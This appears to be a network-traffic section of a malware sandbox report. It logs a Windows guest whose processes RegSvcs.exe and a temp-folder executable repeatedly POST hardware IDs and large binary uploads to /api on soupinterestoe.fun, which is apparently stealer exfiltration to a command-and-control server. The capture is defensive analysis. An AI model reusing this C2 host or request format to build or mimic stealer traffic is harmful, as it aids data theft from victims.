Dec 27, 2023 18:13:24.160118103 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=b1t8hvni71ppieaea5nheqdsnr; expires=Sun, 21-Apr-2024 11:00:02 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:23 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:23 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:23 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zyelyOrPTTM5zzAatrGNJowwF%2FX3F6czBficxCQD0vJ05owe4ILb9BU5wFkJm4YMqMxJzGVOL7MyB%2Betfgh5vZypePI9Pfn9ePHrgggTcO5%2BIFCMibrrQYsV3BkZe0nndP83ZLU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c331a2f8f Data Raw: Data Ascii:
Dec 27, 2023 18:13:24.160130024 CET	32	IN	Data Raw: 33 31 35 66 2d 44 46 57 0d 0a 0d 0a 66 0d 0a 6f 6b 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a Data Ascii: 315f-DFWfok 212.102.41.2
Dec 27, 2023 18:13:24.160140038 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	49824	104.21.24.252	80	3260	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:25.943311930 CET	368	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=6CVqwuwmGvYhFJMe8RA5hLxcKQzyZI48tpwIChnfPmI-1703697168-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 424566 Host: soupinterestoe.fun
Dec 27, 2023 18:13:25.943458080 CET	11574	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 31 45 42 44 36 33 46 45 34 37 41 46 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"21EBD63FE47AF10E3F4A52D9F16B7690--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"G
Dec 27, 2023 18:13:26.064752102 CET	1286	OUT	Data Raw: d3 05 e7 f7 f5 a8 00 15 4f f1 2b d4 0c 40 aa 6b c3 1b 89 1c 99 86 03 8f a6 be 53 51 c8 8a 8b 3b 6d 0c 2a 06 da e2 07 db bd 2b 52 52 f8 67 95 41 e3 88 bd 3c 1b a1 e0 cd 95 67 9e 85 20 93 db 43 6e a9 c6 1c cd 44 e7 2a 67 9c 4b 48 27 59 d9 05 97 2b Data Ascii: O+@kSQ;m+RRgA<g CnDgKH'Y+z "~-j^]61K>.)l]lnt5GH&-eW=ea31AKm4aslph:[WxE.A*qL?^(ZTAbP-DP_>#4v:}=&3
Dec 27, 2023 18:13:26.064971924 CET	2572	OUT	Data Raw: d4 6a 16 e8 b6 ab 78 36 d9 2c e8 02 1a 0b 23 71 52 ab 33 44 53 e0 bb f3 61 cc d4 d8 a1 42 0b 45 dd 77 2c 54 56 67 6b 5a 0b 3a 7a 9b d8 45 bf ae e1 58 eb af ca 42 92 23 c3 9f f9 d0 29 11 42 d7 08 ee 1a 42 7d d6 95 3b 90 83 b1 62 1b 78 df 52 40 48 Data Ascii: jx6,#qR3DSaBEw,TVgkZ:zEXB#)BB};bxR@Hnb& uIb]M$t!~Ins0g+[mknMbu&FG'PNcW#HL >Bb]{{3r<1]f4ol*8KqM8Bx_>CweD>+-
Dec 27, 2023 18:13:26.064994097 CET	2572	OUT	Data Raw: 6a a5 d3 0f d6 db 91 fb 5f 90 01 16 f6 fa 05 ad 6d 75 0a 2b b6 28 7f ea 13 ca 42 1a c8 08 6b bc e1 c6 b6 87 62 c1 90 fd 89 9a 32 95 6b 8d c6 69 54 8a 1b fa cd 0e 75 a8 be ef ed 70 53 fa 6e b9 bc 75 58 63 12 49 ad aa 68 1b d9 bd 10 af cd 03 c9 93 Data Ascii: j_mu+(Bkb2kiTupSnuXcIhe+/$os6lqBO^Vu-6Pkg"f5qI3vI$z*Td='[^JA`#l UO]qk)}RB'z4R_
Dec 27, 2023 18:13:26.065032005 CET	6430	OUT	Data Raw: 23 02 cf 42 00 f4 05 b7 cd 0e 80 f3 82 38 30 8b 18 9d fb 04 14 f2 d3 56 34 33 a8 96 a1 2f 08 1a c8 b4 8a 4d 04 12 7d 52 34 ec 14 01 37 27 a0 f1 db a4 6d 37 0c 90 7d 6b cf fd 68 b5 ea d8 05 c0 8b 07 6c 24 77 7a af 6c 25 cf e8 9b cb d4 04 48 fa 2d Data Ascii: #B80V43/M}R47'm7}khl$wzl%H-_gF_^)V9B"Rk[gc][>,A5%bmDO3tu07N5CpKy#NW7](cjuW\|Qe5;AIX!+*
Dec 27, 2023 18:13:26.065047979 CET	6430	OUT	Data Raw: 3d 1f ab 02 c2 de 38 aa 4a 3e aa a2 62 03 43 1f c8 2c 7d 91 19 ad ba 82 42 55 29 59 48 59 e8 58 fc fc a2 a4 30 27 32 79 6b 46 4d 36 a8 53 ba 5e cb 0c c9 eb 1e 63 52 e7 6b 2d d1 dc 99 8a 9f 96 77 ce bf 91 22 a8 30 a9 07 44 df 1a 7a d6 46 ea 02 83 Data Ascii: =8J>bC,}BU)YHYX0'2ykFM6S^cRk-w"0DzFB8DJS!6LX{PIZOjm\|Zt9XAA89p{/^$L{Iw9JldzVpuHP@mhioXUXaLTa U %/i*BUaP
Dec 27, 2023 18:13:26.065071106 CET	5144	OUT	Data Raw: 2a 90 0b 15 71 f0 e6 e5 75 84 c0 ee 03 5d f9 4b 04 8d e1 af 15 be ce 09 5b 75 c5 79 70 89 14 b3 7d 27 09 a5 8f 32 34 f3 53 3d 76 de 5a b2 cc dc 37 62 42 9c 74 80 35 da 7d 9c 5d af 93 2b 11 c4 4a ae 2e fd 50 12 88 f1 d4 40 d4 14 fc 4b c0 38 7a ed Data Ascii: qu]K[uyp}'24S=vZ7bBt5}]+J.P@K8zsh#(bD::}^W8m_WJEwe>+vK>7b?r<sqtwK_BK-[\|]&q++?pPSj
Dec 27, 2023 18:13:26.186244965 CET	2572	OUT	Data Raw: a8 b6 3c 50 9e db fa d5 3e 4f 9d 7e 96 57 1b 46 31 53 17 2b 57 08 44 42 16 32 88 08 da d4 62 20 38 50 9a 12 41 9a 2f 48 fc 84 58 ac 1d ed 67 95 4d 66 2c ce 62 dd ef a5 3c 48 f7 ed 94 44 33 b1 03 94 08 54 ce 8b a7 8b fa 3b 6d 54 18 aa fd 37 41 88 Data Ascii: <P>O~WF1S+WDB2b 8PA/HXgMf,b<HD3T;mT7AWc!g"k07ZyShTlwnA-D,!+#},!&jV\V2T&rum19aLFt.z3K8\"
Dec 27, 2023 18:13:26.186475039 CET	5144	OUT	Data Raw: 3b 6a 64 5b f0 cd ba 24 d8 37 de e7 b6 99 08 69 eb c4 d9 fd 47 92 5b fa e1 c3 bf 78 50 6d 0d 60 07 62 92 91 19 8d d1 fb 6b 1d b6 c3 0b f4 f0 ba 02 3f 05 09 ae 6a 31 9a db a8 3a f0 e3 bb 2f 0d bd 69 54 a7 dc 94 5b 85 95 7b fe 28 94 5e d7 4a 2c 4d Data Ascii: ;jd[$7iG[xPm`bk?j1:/iT[{(^J,Mo{KL)sfNQR?K>9QUyaL^`;;8_ R[<>9uAbr(.n`gG7+; f%r=:#sEP
Dec 27, 2023 18:13:26.186532021 CET	5144	OUT	Data Raw: f7 04 60 7c e6 5b 70 7b 63 c4 f5 20 b3 40 a5 d4 9a b5 d9 69 69 b0 ec b3 f1 6a 1b b0 ba 1e c2 b3 46 b5 4f ca e6 2a d7 1c 93 20 ec 51 eb 4e a1 c6 cb 6c fe e9 50 bc 02 c3 da 8a 65 0f 2d b5 e6 8e f9 f6 74 99 bc f9 6a bd 3e 19 c0 79 ed 79 8d 92 10 21 Data Ascii: `\|[p{c @iijFO* QNlPe-tj>yy!G3BkLo %}pg_a?h>JUapHpg98NAOF@zO\|Nvn*j.xm}E3cX383$yNeX"`klw5
Dec 27, 2023 18:13:29.355781078 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=c7djgctlq47usai80j0966nveu; expires=Sun, 21-Apr-2024 11:00:07 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:28 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:28 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:28 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZNWEGJ6PGEKQCzfEPks5y%2B6mBeLiPq6BNV4JluKfHwbFuSpPGFt8CnL64%2FRdPM8hpP3fd6qr4lNG0VoqiJj1CCWt3yXQ8ktfsfhJyqKJTxyroNhLBTP6LZn4bN3ImIyyU4kHRxM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c331b18feb0 Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	49825	104.21.24.252	80	4048	C:\Users\user\AppData\Local\Temp\9E77.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:26.520798922 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=Mye14B8h2WURExsEa0lzRi__cmPXIvhpIJMDFCvL1.A-1703697169-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 18:13:26.521009922 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 32 31 65 62 64 36 33 66 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l221ebd63f000052d9f10edd42e390u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 18:13:26.923504114 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=0ctatvo5d970ojer612c3v0do3; expires=Sun, 21-Apr-2024 11:00:05 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:26 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:26 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:26 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GqUn5iT9aW5ILhjRES5tC6FMsAAIHn%2BoQkpDDttSTPcsTaPZXCYbd4AlZ%2F2c5wct0Guf5DB8c9Ji0o8UXdtX3fMKFuOfIzoW74bzURM%2FfdotAsWNp76YUETn4sAuBvpjdCP0P%2Bc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c331b54 Data Raw: Data Ascii:
Dec 27, 2023 18:13:26.923516989 CET	41	IN	Data Raw: 65 33 36 62 61 63 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: e36bac-DFW15Malformed packet data
Dec 27, 2023 18:13:26.923527002 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	49826	104.21.24.252	80	4048	C:\Users\user\AppData\Local\Temp\9E77.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:28.033121109 CET	367	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=Mye14B8h2WURExsEa0lzRi__cmPXIvhpIJMDFCvL1.A-1703697169-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 11895 Host: soupinterestoe.fun
Dec 27, 2023 18:13:28.033380985 CET	11895	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 32 31 65 62 64 36 33 66 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l221ebd63f000052d9f10edd42e390u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 18:13:28.579596996 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=9s52tje8ooe47bu5f2u6m35ec0; expires=Sun, 21-Apr-2024 11:00:07 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:28 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:28 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:28 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=i1OAjvGNbe2C4K8PODhSZRDDBXZgmLRmwvdJLJMtMwdKGY%2BUEOCVBGnWDWbXCxDyH8MbAEwtiTg5r90pFSHI9pGjBCgl8U5pqnCrVXDunIz8GD0hRZ%2BKrnH5CAUW2Ezo6oe4yh4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c331be9eade Data Raw: Data Ascii:
Dec 27, 2023 18:13:28.579611063 CET	30	IN	Data Raw: 38 37 2d 44 46 57 0d 0a 0d 0a 66 0d 0a 6f 6b 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a Data Ascii: 87-DFWfok 212.102.41.2
Dec 27, 2023 18:13:28.579621077 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	49827	104.21.24.252	80	4048	C:\Users\user\AppData\Local\Temp\9E77.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:29.613713980 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=Mye14B8h2WURExsEa0lzRi__cmPXIvhpIJMDFCvL1.A-1703697169-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 18:13:29.613928080 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 32 31 65 62 64 36 33 66 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l221ebd63f000052d9f10edd42e390u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 18:13:30.151683092 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=546flekmr0qv16k560og1m3acu; expires=Sun, 21-Apr-2024 11:00:09 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:30 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:30 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:30 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GBkdwuSlSQxEbwa5oOz0C2I5eOZxz%2BPW%2BJUzrtEAwDmBwzIQdBvfr%2BXWmMr3gMj1pDaKXbaMtpB6ADoITVfbObnf%2BhAelAY4itd1NhayxAyL2JmZebr4jnPWGhjG8nQCr6%2BNnq0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c331c Data Raw: Data Ascii:
Dec 27, 2023 18:13:30.151695967 CET	43	IN	Data Raw: 37 64 35 39 34 36 32 39 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 7d594629-DFW15Malformed packet data
Dec 27, 2023 18:13:30.151705980 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	49828	104.21.24.252	80	4048	C:\Users\user\AppData\Local\Temp\9E77.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:30.844769001 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=Mye14B8h2WURExsEa0lzRi__cmPXIvhpIJMDFCvL1.A-1703697169-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 18:13:30.844961882 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 32 31 65 62 64 36 33 66 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l221ebd63f000052d9f10edd42e390u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 18:13:31.372565031 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=qf5ttioq644ssvlauh7fsv8tu3; expires=Sun, 21-Apr-2024 11:00:10 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:31 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:31 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:31 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zctsVbAsdZQYvBg8t4tFLUarc77S97Dlsp2ZUGDO%2FDxeT3ivDDo2b7OHFEfqQo2WMNxodx8NzhEA4MkgPffMAnO8wbFPOSnHymq4WDUOkKFFba2Fb1qAfL8K0QJBFPNOjcDpuOg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c331d02e3d28e Data Raw: Data Ascii:
Dec 27, 2023 18:13:31.372579098 CET	35	IN	Data Raw: 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: -DFW15Malformed packet data
Dec 27, 2023 18:13:31.372590065 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	49829	104.21.24.252	80	4048	C:\Users\user\AppData\Local\Temp\9E77.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:32.090692043 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=Mye14B8h2WURExsEa0lzRi__cmPXIvhpIJMDFCvL1.A-1703697169-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
Dec 27, 2023 18:13:32.090886116 CET	500	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 6c 32 32 31 65 62 64 36 33 66 30 30 30 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"l221ebd63f000052d9f10edd42e390u--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"LG
Dec 27, 2023 18:13:32.473002911 CET	1286	IN	HTTP/1.1 200 OK Date: Wed, 27 Dec 2023 17:13:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=9j49hnijl37kt0q65dcfd06d6r; expires=Sun, 21-Apr-2024 11:00:11 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sun, 25-Feb-2024 17:13:32 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Sun, 25-Feb-2024 17:13:32 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Sun, 25-Feb-2024 17:13:32 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6FMocU0f0L1Z9kDeKF8W3SGtN12aJ1Qf4vfTeeVipLKSgDvo4tLz5Mv9vArYbhzNNCXuVLILznwbu026ECcd8z%2BXJ%2BcCEc7GK%2BC4W8r24cqIdL6EGFotKWgivFe7eZ5iugVIDQM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83c331d7fc6 Data Raw: Data Ascii:
Dec 27, 2023 18:13:32.473016977 CET	39	IN	Data Raw: 32 64 32 39 2d 44 46 57 0d 0a 0d 0a 31 35 0d 0a 4d 61 6c 66 6f 72 6d 65 64 20 70 61 63 6b 65 74 20 64 61 74 61 0d 0a Data Ascii: 2d29-DFW15Malformed packet data
Dec 27, 2023 18:13:32.473026991 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	49830	104.21.24.252	80	4048	C:\Users\user\AppData\Local\Temp\9E77.exe

Timestamp	Bytes transferred	Direction	Data
Dec 27, 2023 18:13:33.308382034 CET	365	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=Mye14B8h2WURExsEa0lzRi__cmPXIvhpIJMDFCvL1.A-1703697169-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 500 Host: soupinterestoe.fun
